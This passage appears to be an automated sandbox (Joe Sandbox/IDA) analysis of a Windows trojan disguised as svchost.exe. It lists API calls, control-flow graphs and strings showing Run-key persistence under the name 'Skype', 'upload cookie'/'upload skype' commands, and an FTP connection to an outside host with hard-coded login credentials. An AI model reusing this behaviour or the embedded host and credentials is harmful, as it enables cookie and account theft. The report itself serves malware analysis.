      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(version,00000000), ref: 006747BA
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 006747D2
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(starts,00000000), ref: 006747F0
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 00674808
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(upload skype,00000000), ref: 00674826
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 0067483E
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(upload cookie,00000000), ref: 0067485C
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006749EE
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00674A03
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
      • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$A?$basic_string@$??0?$basic_string@$V01@V01@@$??4?$basic_string@sprintf$?erase@?$basic_string@V12@$?find@?$basic_string@$??1?$basic_string@fputc$Createfopen$??$?CloseD@1@@std@@D@2@@0@DirectoryLocalNameTimeUserV10@V?$basic_string@ValueY?$basic_string@fgetc
      • String ID: $ $"%s\svchost.exe"$C:\Users\%s\AppData\Local\windows update$Software\Microsoft\Windows\CurrentVersion\Run$\config$\status_f.txt$just reinstall$number$reg path s$starts$status number$sub$upload cookie$upload skype$version$windows update
      • API String ID: 2521483247-3358930256
      • Opcode ID: 841cbc728fa1bcfdc9e60058f80e2d6122a4282e944fea76def74c5d457579c3
      • Instruction ID: 2e39679dcfc590a3ce2afa42e4adcbbe60767b7a73fa2e65c69015fee76ad455
      • Opcode Fuzzy Hash: 841cbc728fa1bcfdc9e60058f80e2d6122a4282e944fea76def74c5d457579c3
      • Instruction Fuzzy Hash: 47D17F706147409FD708EF74ED0AB9A7BA7BB84704F40941CF54E832A1EB70A948CBA6

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 110 671669 111 671670-671693 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 110->111 111->111 112 671695-6716d4 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 111->112 113 6716d6-6716fb ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 112->113 114 6716fd-671703 112->114 113->113 113->114 115 671705-671728 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 114->115 116 67172a-671769 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 114->116 115->115 115->116 117 671797-67179d 116->117 118 67176b 116->118 120 6717c5-671806 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 117->120 121 67179f 117->121 119 671770-671795 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 118->119 119->117 119->119 123 67182f-671835 120->123 124 671808-67182d ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 120->124 122 6717a0-6717c3 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 121->122 122->120 122->122 125 671837 123->125 126 671865-6718a4 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 123->126 124->123 124->124 127 671840-671863 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 125->127 128 6718a6-6718cb ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 126->128 129 6718cd-6718d3 126->129 127->126 127->127 128->128 128->129 130 6718d5-6718f8 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 129->130 131 6718fa-67193b ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 129->131 130->130 130->131 132 671967-67196d 131->132 133 67193d 131->133 134 671995-6719dc ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 132->134 135 67196f 132->135 136 671940-671965 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 133->136 138 671a07-671a0d 134->138 139 6719de 134->139 137 671970-671993 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 135->137 136->132 136->136 137->134 137->137 141 671a35-671a50 fclose ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 138->141 142 671a0f 138->142 140 6719e0-671a05 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 139->140 140->138 140->140 144 671a56-671a73 call 674bfc 141->144 143 671a10-671a33 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 142->143 143->141 143->143
      APIs
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00671675
      • fputc.MSVCR90 ref: 00671689
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90( ), ref: 0067169E
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,tics=%d,?), ref: 006716B5
      • sprintf.MSVCR90 ref: 006716BC
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 006716CB
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 006716E2
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 006716F2
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 0067170A
      • fputc.MSVCR90 ref: 0067171E
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90( ), ref: 00671733
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,starts=%d,?), ref: 0067174A
      • sprintf.MSVCR90 ref: 00671751
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00671760
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 0067177C
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 0067178C
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 006717A5
      • fputc.MSVCR90 ref: 006717B9
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$fputc$??4?$basic_string@?erase@?$basic_string@V01@V12@sprintf
      • String ID: $just reinstall=%d$reg path s=%s$starts=%d$sub=%d$tics=%d$version=%d
      • API String ID: 765835564-579052364
      • Opcode ID: 8ecbf6b94decb305cf17e1439f1b42a36020fad34165fd984cd3e590bb6428a9
      • Instruction ID: 45b88595b42151c48892b774e5006deb30ecfc3e444c8ea11d035c33d08e92f4
      • Opcode Fuzzy Hash: 8ecbf6b94decb305cf17e1439f1b42a36020fad34165fd984cd3e590bb6428a9
      • Instruction Fuzzy Hash: E6C1AE71508701AFD308DF24ED99AABB7B6EB85702F00955DF48E971A1DB309D88CB62

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 147 671839 148 671840-671863 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 147->148 148->148 149 671865-6718a4 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 148->149 150 6718a6-6718cb ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 149->150 151 6718cd-6718d3 149->151 150->150 150->151 152 6718d5-6718f8 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 151->152 153 6718fa-67193b ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 151->153 152->152 152->153 154 671967-67196d 153->154 155 67193d 153->155 156 671995-6719dc ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 154->156 157 67196f 154->157 158 671940-671965 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 155->158 160 671a07-671a0d 156->160 161 6719de 156->161 159 671970-671993 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 157->159 158->154 158->158 159->156 159->159 163 671a35-671a50 fclose ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 160->163 164 671a0f 160->164 162 6719e0-671a05 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 161->162 162->160 162->162 166 671a56-671a73 call 674bfc 163->166 165 671a10-671a33 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 164->165 165->163 165->165
      APIs
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00671845
      • fputc.MSVCR90 ref: 00671859
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90( ), ref: 0067186E
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,version=%d,?), ref: 00671885
      • sprintf.MSVCR90 ref: 0067188C
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 0067189B
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 006718B2
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 006718C2
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 006718DA
      • fputc.MSVCR90 ref: 006718EE
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90( ), ref: 00671903
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,just reinstall=%d,00000000), ref: 0067191C
      • sprintf.MSVCR90 ref: 00671923
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00671932
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 0067194C
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 0067195C
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00671975
      • fputc.MSVCR90 ref: 00671989
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90( ), ref: 0067199E
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 006719AB
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,reg path s=%s,00000000), ref: 006719BD
      • sprintf.MSVCR90 ref: 006719C4
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 006719D3
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 006719EC
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 006719FC
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00671A15
      • fputc.MSVCR90 ref: 00671A29
      • fclose.MSVCR90 ref: 00671A3B
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671A50
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$fputc$??4?$basic_string@?erase@?$basic_string@V01@V12@sprintf$??1?$basic_string@fclose
      • String ID: $just reinstall=%d$reg path s=%s$version=%d
      • API String ID: 454636785-3139052014
      • Opcode ID: 56d20d7dff1b1b1598f8a3f4de31410f25093ca4c797cd553eb32ccea70afcda
      • Instruction ID: 5515be4141823d09dfe12b6cf4cbea67139f1f29678f85b0cc1d1164a9627499
      • Opcode Fuzzy Hash: 56d20d7dff1b1b1598f8a3f4de31410f25093ca4c797cd553eb32ccea70afcda
      • Instruction Fuzzy Hash: 8561AE715087019FD708DF24ED99AABB7B6FB85702F00951DF48E971A1DB309D48CB62

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 169 6741b0-674243 DeleteFileA GetLocalTime InternetOpenA InternetConnectA 170 674433-67446a call 671480 call 674bfc 169->170 171 674249-6742c8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 call 673b90 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf call 671260 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpCreateDirectoryA 169->171 182 6742e6-6742f2 call 671cb0 171->182 183 6742ca-6742e3 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 171->183 188 6742f4 call 6721f0 182->188 189 6742f9-674300 182->189 183->182 188->189 191 674306-67430d 189->191 192 6743ec-6743f3 189->192 195 67430f-674316 191->195 196 67432b-674383 RegOpenKeyExA memset RegQueryValueExA 191->196 193 674407-67442d InternetCloseHandle * 2 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 192->193 194 6743f5-6743fc 192->194 193->170 194->193 199 6743fe-674404 call 673790 194->199 195->196 200 674318-67431f 195->200 197 674385-67439a ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 196->197 198 6743dc-6743e6 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z 196->198 201 6743ac-6743da RegSetValueExA 197->201 202 67439c-6743a6 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z 197->202 198->192 199->193 200->196 204 674321-674326 call 6724f0 200->204 201->192 202->201 204->192
      APIs
      • DeleteFileA.KERNELBASE(cs.exe,AED9119B), ref: 006741F5
      • GetLocalTime.KERNEL32(0067845C), ref: 00674200
      • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00674210
      • InternetConnectA.WININET(00000000,ruslyz.ftp.narod.ru,00000015,ruslyz,1qazse4rfv,00000001,08000000,00000000), ref: 00674236
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(connect), ref: 00674257
        • Part of subcall function 006712F0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(?,AED9119B,00000000,00675699,000000FF,00672550,?,?,?,AED9119B), ref: 00671322
        • Part of subcall function 006712F0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(00676268,?,?,?,AED9119B), ref: 00671332
        • Part of subcall function 006712F0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?,?,AED9119B), ref: 0067133F
        • Part of subcall function 006712F0: SendMessageA.USER32(00010404,0000000C,00000000,00000000), ref: 00671351
        • Part of subcall function 006712F0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,?,AED9119B), ref: 00671363
        • Part of subcall function 00673B90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ,AED9119B), ref: 00673BD4
        • Part of subcall function 00673B90: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,v_%d\status.txt,FFFFFFFF), ref: 00673BF6
        • Part of subcall function 00673B90: sprintf.MSVCR90 ref: 00673BFD
        • Part of subcall function 00673B90: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00673C10
        • Part of subcall function 00673B90: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 00673C2C
        • Part of subcall function 00673B90: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00673C3C
        • Part of subcall function 00673B90: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000,00000000,00000002,00000000), ref: 00673C6A
        • Part of subcall function 00673B90: FtpGetFileA.WININET(00000000,status.txt,00000000), ref: 00673C7D
        • Part of subcall function 00673B90: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00676A00), ref: 00673C97
        • Part of subcall function 00673B90: fopen.MSVCR90 ref: 00673CA4
        • Part of subcall function 00673B90: fopen.MSVCR90 ref: 00673CB5
        • Part of subcall function 00673B90: memset.MSVCR90 ref: 00673CC8
        • Part of subcall function 00673B90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673CD6
        • Part of subcall function 00673B90: fgetc.MSVCR90 ref: 00673CFC
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 00674273
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,v_%d,FFFFFFFF), ref: 00674295
      • sprintf.MSVCR90 ref: 0067429C
        • Part of subcall function 00671260: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,00672A9E,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00671267
        • Part of subcall function 00671260: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 0067127B
        • Part of subcall function 00671260: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00671288
        • Part of subcall function 00671260: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 0067129C
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 006742B2
      • FtpCreateDirectoryA.WININET(00000000,00000000), ref: 006742C0
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(cre folder), ref: 006742D8
      • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,000F003F,?), ref: 00674341
      • memset.MSVCR90 ref: 00674353
      • RegQueryValueExA.ADVAPI32 ref: 0067437B
      • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP90(0067B270,00676226), ref: 0067438F
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(?,?,?), ref: 006743A6
      • RegSetValueExA.ADVAPI32(?,Skype,00000000,00000001,?,00000005,?,?), ref: 006743D4
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(NULL), ref: 006743E6
      • InternetCloseHandle.WININET(00CC11AC), ref: 00674413
      • InternetCloseHandle.WININET(00000000), ref: 0067441C
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 0067442D
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
      • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$A?$basic_string@$??0?$basic_string@$InternetV01@$?erase@?$basic_string@V12@$??1?$basic_string@??4?$basic_string@CloseFileHandleOpenValueY?$basic_string@fopenmemsetsprintf$??$?8ConnectCreateD@1@@std@@D@2@@0@DeleteDirectoryLocalMessageQuerySendTimeV01@@V?$basic_string@fgetc
      • String ID: $1qazse4rfv$NULL$Skype$Software\Microsoft\Windows\CurrentVersion\Run\$connect$cre folder$cs.exe$null$ruslyz$ruslyz.ftp.narod.ru$v_%d
      • API String ID: 1455528554-2122441541
      • Opcode ID: 30760255efe6b59bed1c7116006aeb156c8c3f400c98986d78dc556c5b8379e3
      • Instruction ID: 058ad0b5af04f4d9f7f821182c2483d6033da36dac69d7b919a9c263789439da
      • Opcode Fuzzy Hash: 30760255efe6b59bed1c7116006aeb156c8c3f400c98986d78dc556c5b8379e3
      • Instruction Fuzzy Hash: 1861E370644700AFD728EF64DC0EBAA3BA7AB48704F00941DF51D972E2DBB09988CF56

      Control-flow Graph

      APIs
      • PostQuitMessage.USER32(?), ref: 00674A6B
      • CreateWindowExA.USER32(00000000,edit,00000000,50A00804,0000000A,00000014,000003E8,000001F4,?,00000000,00670000,00000000), ref: 00674AAC
      • SetTimer.USER32(?,000003E8,000493E0,006741B0), ref: 00674ACC
      • BeginPaint.USER32(?,?), ref: 00674AEC
      • EndPaint.USER32(?,?), ref: 00674AF8
      • DefWindowProcA.USER32(?,?,?,?), ref: 00674B23
      • DefWindowProcA.USER32(?,00000111,?,?), ref: 00674B56
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
